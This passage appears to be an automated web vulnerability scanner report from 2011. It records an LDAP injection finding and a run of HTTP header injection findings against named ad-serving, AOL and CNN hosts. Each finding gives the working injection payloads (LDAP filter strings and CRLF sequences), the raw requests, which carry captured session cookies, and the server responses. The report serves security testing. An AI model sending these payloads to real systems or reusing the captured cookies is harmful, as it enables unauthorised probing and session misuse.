The payloads 1fe895629ae7659c)(sn=* and 1fe895629ae7659c)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /bmx3/broker.pli?pid=1fe895629ae7659c)(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1fe895629ae7659c)!(sn=*&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:16:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1fe895629ae7659c&#41;!&#40;sn=exp=1&initExp=Thu May 5 01:16:21 2011&recExp=Thu May 5 01:16:21 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 01:16:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. HTTP header injection  previous  next
There are 79 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dbbe6%0d%0aaea1137f35f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifdbbe6%0d%0aaea1137f35f?557101547 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdbbe6
aea1137f35f
:
Date: Thu, 05 May 2011 00:59:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 26ba9%0d%0a8501ac1155d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs73546360775362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D5%252F4%252F2011%252012%253A45%253A22%25204%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fitunes.apple.com%252FWebObjects%252FMZStore.woa%252Fwa%252FviewEula%253Fid%253D347839246%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D2%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1022%26bh%3D1007%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D126ba9%0d%0a8501ac1155d&A2S=1;ord=1217103637 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s73546360775362?AQB=1&vvpr=true&&ndh=1&t=5%2F4%2F2011%2012%3A45%3A22%204%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewEula%3Fid%3D347839246&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D2&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1022&bh=1007&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=126ba9
8501ac1155d
&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240264641;lastimptime=1304557682;lis=522165;lip=63097682;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5465585.3;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304599550:
Date: Thu, 05 May 2011 12:45:49 GMT
Server: GFE/2.0
Content-Type: text/html


4.3. http://api.screenname.aol.com/auth/login [devId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the devId request parameter is copied into the Location response header. The payload d807c%0d%0af48a51c2172 was submitted in the devId parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=d807c%0d%0af48a51c2172&f=qs&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:45 GMT
Set-Cookie: JSESSIONID=357BE1B712C7CBD42E688AD1F49F1367; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=d807c
f48a51c2172
&f=qs
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=454
Connection: Keep-Alive


4.4. http://api.screenname.aol.com/auth/login [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the f request parameter is copied into the Location response header. The payload b288d%0d%0a423203780bc was submitted in the f parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d%0d%0a423203780bc&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:46 GMT
Set-Cookie: JSESSIONID=B4961C5905C7619F69B7FF973CC99CCB; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d
423203780bc

Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=478
Connection: Keep-Alive


4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 7311c%0d%0a5371b4a8ad4 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=7311c%0d%0a5371b4a8ad4&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=92e362f3-0c29-4bfc-89bf-3b975bf183723HX0c0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=7311c
5371b4a8ad4
&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 83642%0d%0aa73a02d7dd9 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=83642%0d%0aa73a02d7dd9 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=76238e15-8c4d-4f61-824e-4e05fec4c7d73HX040; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=83642
a73a02d7dd9
&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload aea5e%0d%0addd8221295a was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=aea5e%0d%0addd8221295a&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=78d3cb7f-dae9-42bd-ae1b-0298e52a5d1b3HX050; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=aea5e
ddd8221295a
; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b97bc%0d%0ac8c08d61955 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/b97bc%0d%0ac8c08d61955/04/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:36 GMT
Server: Apache
Location: http://money.cnn.com/b97bc
c8c08d61955
/04/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/b97bc
c8c08d61955/04/22/p
...[SNIP]...

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 88309%0d%0ab79d19b4924 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/88309%0d%0ab79d19b4924/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/88309
b79d19b4924
/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/88309
b79d19b4924/22
...[SNIP]...

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 78d87%0d%0a6fb9e0e3c55 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/78d87%0d%0a6fb9e0e3c55/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
...[SNIP]...

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 38578%0d%0adceb17e336b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/38578%0d%0adceb17e336b/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/38578
dceb17e336b
/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/38578
dceb17e3
...[SNIP]...

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c974d%0d%0adfb8820098c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/c974d%0d%0adfb8820098c/index.htm HTTP/1.1
